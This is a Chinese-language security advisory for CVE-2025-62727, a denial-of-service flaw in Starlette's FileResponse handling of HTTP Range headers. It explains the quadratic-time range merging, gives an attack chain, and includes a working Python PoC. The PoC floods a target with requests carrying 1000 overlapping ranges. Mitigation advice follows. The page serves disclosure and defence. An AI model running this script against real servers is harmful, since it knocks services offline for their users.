CVE-2025-62727 Starlette FileResponse Range头处理拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-62727

漏洞类型

拒绝服务（DoS）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Starlette

漏洞概述

CVE-2025-62727是Starlette框架中的一个高危拒绝服务漏洞。Starlette是一个轻量级的ASGI框架/工具包，广泛应用于Python Web开发中。该漏洞存在于Starlette 0.39.0至0.49.0版本的FileResponse组件中，攻击者可以通过发送精心构造的HTTP Range请求头，触发Range解析和合并逻辑中的二次时间复杂度处理问题。当Range头包含大量重叠或分散的范围时，服务器需要进行O(n²)级别的计算处理，导致单个HTTP请求就能造成严重的CPU资源耗尽。这种攻击方式使得攻击者可以在短时间内对目标服务器实施拒绝服务攻击，影响所有使用StaticFiles或FileResponse提供文件服务的端点。由于无需认证且利用简单，该漏洞对互联网暴露的Starlette应用构成严重威胁。

技术细节

该漏洞的核心问题在于Starlette的FileResponse对HTTP Range头的解析和合并逻辑存在算法效率缺陷。当客户端发送包含多个范围的Range请求时（如：Range: bytes=0-1000,2000-3000,4000-5000,...），服务器需要对这些范围进行排序、去重和合并操作。在存在大量范围或重叠范围的情况下，合并算法的时间复杂度达到O(n²)，其中n为范围数量。攻击者可以通过构造包含数百甚至数千个重叠范围的Range头（如：Range: bytes=0-1,0-2,0-3,0-4,...），使服务器在处理单个请求时消耗大量CPU资源。正常情况下，处理简单文件请求可能只需要几毫秒，但恶意构造的Range请求可能需要数秒甚至数十秒才能完成，从而造成服务器响应缓慢或完全无响应。此漏洞影响所有使用FileResponse或StaticFiles的应用，特别是那些提供大文件下载服务的端点。

攻击链分析

STEP 1

步骤1

攻击者识别运行Starlette 0.39.0-0.49.0版本的应用，该应用使用FileResponse或StaticFiles提供文件服务

STEP 2

步骤2

攻击者构造包含大量重叠Range范围的HTTP请求头，如'Range: bytes=0-100,0-200,0-300,...'（数百到数千个范围）

STEP 3

步骤3

服务器接收到恶意请求后，FileResponse的Range解析逻辑开始处理这些范围，触发O(n²)复杂度的排序和合并操作

STEP 4

步骤4

单个恶意请求导致服务器CPU占用率急剧上升，处理时间从正常的几毫秒延长到数十秒

STEP 5

步骤5

攻击者持续发送少量恶意请求即可耗尽服务器资源，造成正常用户无法访问服务，实现拒绝服务攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import httpx
import time

# CVE-2025-62727 PoC - Starlette FileResponse DoS via Range Header
# Target: Starlette application with StaticFiles or FileResponse

def exploit_cve_2025_62727(target_url: str, duration: int = 10):
    """
    PoC for CVE-2025-62727
    Sends crafted Range header to trigger quadratic-time processing
    
    Args:
        target_url: URL of the vulnerable Starlette endpoint
        duration: Attack duration in seconds
    """
    # Generate malicious Range header with many overlapping ranges
    # This triggers O(n²) complexity in Range parsing/merging logic
    ranges = []
    for i in range(1000):  # 1000 overlapping ranges
        ranges.append(f"{i}-{i+100}")
    
    range_header = "bytes=" + ",".join(ranges)
    
    headers = {
        "Range": range_header,
        "User-Agent": "CVE-2025-62727-PoC"
    }
    
    print(f"[*] Starting DoS attack against {target_url}")
    print(f"[*] Range header length: {len(range_header)} bytes")
    print(f"[*] Number of ranges: {len(ranges)}")
    
    start_time = time.time()
    attack_count = 0
    
    try:
        with httpx.Client(timeout=30.0) as client:
            while time.time() - start_time < duration:
                try:
                    response = client.get(target_url, headers=headers)
                    attack_count += 1
                    print(f"[+] Request {attack_count} sent, status: {response.status_code}")
                except httpx.TimeoutException:
                    print("[!] Request timeout - target may be exhausted")
                    attack_count += 1
                except Exception as e:
                    print(f"[!] Error: {e}")
    
    except KeyboardInterrupt:
        print("\n[!] Attack interrupted by user")
    
    elapsed = time.time() - start_time
    print(f"\n[*] Attack completed")
    print(f"[*] Total requests: {attack_count}")
    print(f"[*] Duration: {elapsed:.2f} seconds")

if __name__ == "__main__":
    # Example usage
    target = "http://vulnerable-server:8000/static/large-file.bin"
    exploit_cve_2025_62727(target, duration=30)

影响范围

Starlette >= 0.39.0, < 0.49.1

防御指南

临时缓解措施

如果无法立即升级Starlette，可在反向代理或Web应用防火墙层面添加临时缓解措施：限制Range头中范围数量不超过10个，或者在应用层添加中间件检测异常Range请求模式并返回400 Bad Request。另外，配置Web服务器对单个请求的CPU时间进行限制也是一种有效的缓解手段。